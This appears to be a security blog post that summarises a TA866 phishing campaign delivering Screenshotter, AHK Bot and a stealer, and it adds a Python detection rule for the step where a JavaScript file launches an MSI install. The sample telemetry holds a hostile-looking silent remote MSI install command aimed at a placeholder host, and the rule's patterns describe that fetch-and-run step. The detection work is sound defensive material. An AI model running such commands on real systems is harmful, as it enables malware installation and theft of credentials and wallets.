Proofpoint researchers have discovered a new hacking campaign run by a group tracked as TA866. With known links to Russia, TA866 is an advanced group capable of well-organized attacks on a large scale, a capability that stems from acquiring attack tools from different sources and customizing them for each target.
The attack, which began in December 2022, has continued into 2023. It primarily targets victims in the United States and Germany and aims to steal their cryptocurrency wallets, saved account credentials, web browser cookies, and personal information.
Attack methodology
The attack chain begins with an email containing malicious attachments or a URL pointing to a malicious website that hosts the WasabiSeed and Screenshotter malware. The following steps are executed in succession.
1. Phishing email
A user receives an email with a URL leading to a Traffic Distribution System (TDS) named 404 TDS, which prompts the user to download a malicious JavaScript file.
2. MSI package installed
If the user runs the dangerous JavaScript file by double-clicking it, it will install an MSI package containing the WasabiSeed installer.
The MSI package will then perform two actions:
- Make the infected device download and install additional payloads when instructed by the attacker
- Download and run another program known as Screenshotter
Screenshotter, a popular malware program with variants written in several programming languages, takes screen captures of the victim’s device and sends the image files to the attacker’s command and control (C&C) server.
3. Additional payloads downloaded
Next, the attackers will check the screen capture manually to determine their next steps. These steps could include:
- Loading Screenshotter onto the victim’s device again if they are unsatisfied with the received screen captures
- Infecting the victim’s device with AHK Bot
AHK Bot is another malware program that can introduce additional payloads onto the victim’s device, such as:
- Domain profiler: Extracts the infected device’s Active Directory (AD) information and sends it back to the attacker’s server
- Stealer loader: This script will install a stealer malware and load it into the device’s memory (Proofpoint researchers observed Rhadamanthys Stealer malware being used in the most recent campaign)
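As an added example (not from Proofpoint’s report or this post), here is the kind of detection logic a SOC could run over process-creation telemetry to catch the JavaScript-file-to-MSI step in the chain above. It assumes Windows runs a double-clicked .js file under wscript.exe or cscript.exe and installs MSI packages through msiexec.exe, and that events arrive as Sysmon-style key=value lines; the sample events are constructed.

```python
import re
from dataclasses import dataclass
# Assumed process names: a double-clicked .js runs under wscript.exe/cscript.exe,
# and an MSI package is installed by msiexec.exe.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLER = "msiexec.exe"

# Assumed log shape: key=value fields as in a Sysmon event-1 text export.
PARENT_RE = re.compile(r"ParentImage=(\S+)")
IMAGE_RE = re.compile(r"\bImage=(\S+)")  # \b keeps this off "ParentImage="
CMD_RE = re.compile(r"CommandLine=(.*)$")
URL_RE = re.compile(r"https?://", re.IGNORECASE)
@dataclass
class Finding:
    line_no: int
    parent: str
    command: str
    reasons: list

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
def parse_event(line: str):
    parent, image, cmd = (r.search(line) for r in (PARENT_RE, IMAGE_RE, CMD_RE))
    if not (parent and image and cmd):
        return None
    return {"parent": basename(parent.group(1)),
            "image": basename(image.group(1)), "cmd": cmd.group(1).strip()}

def detect_js_to_msi(log_lines):
    """Flag msiexec.exe launches that fit the JS-file -> MSI delivery step."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        ev = parse_event(line)
        if ev is None or ev["image"] != INSTALLER:
            continue
        reasons = []
        if ev["parent"] in SCRIPT_HOSTS:  # a script host spawned the installer
            reasons.append("script-host-parent")
        if URL_RE.search(ev["cmd"]):      # package pulled from a remote URL
            reasons.append("remote-msi-url")
        if reasons:
            findings.append(Finding(n, ev["parent"], ev["cmd"], reasons))
    return findings

# Constructed sample events (not real telemetry); only line 2 should be flagged.
SAMPLE_EVENTS = [
    r"2023-01-10T14:02:11Z EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\wscript.exe CommandLine=wscript.exe C:\Users\alice\Downloads\Invoice_0123.js",
    r"2023-01-10T14:02:13Z EventID=1 ParentImage=C:\Windows\System32\wscript.exe Image=C:\Windows\System32\msiexec.exe CommandLine=msiexec /i https://placeholder.invalid/pkg.msi /qn",
    r"2023-01-10T14:05:00Z EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\msiexec.exe CommandLine=msiexec /i C:\Users\alice\Downloads\7zip.msi",
]
```

A legitimate local MSI install launched from Explorer (the third event) produces no finding, so the rule keys on the script-host parent and the remote package URL rather than on msiexec.exe alone.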
How to prevent Screenshotter malware from infecting your device
To protect yourself against Screenshotter and similar types of malware, follow these precautions:
- Do not open email attachments received from unknown email addresses
- Do not click on links contained in suspicious emails
- Install a personal firewall on your device to monitor all outgoing and incoming connections
- Keep your operating system, web browsers, and installed programs up to date
- Install a reputable antimalware program
Phishing emails are still the primary vehicle used by hackers to infect targets with malware. Fortunately, following the recommendations in this post should be enough to protect your device from such attacks.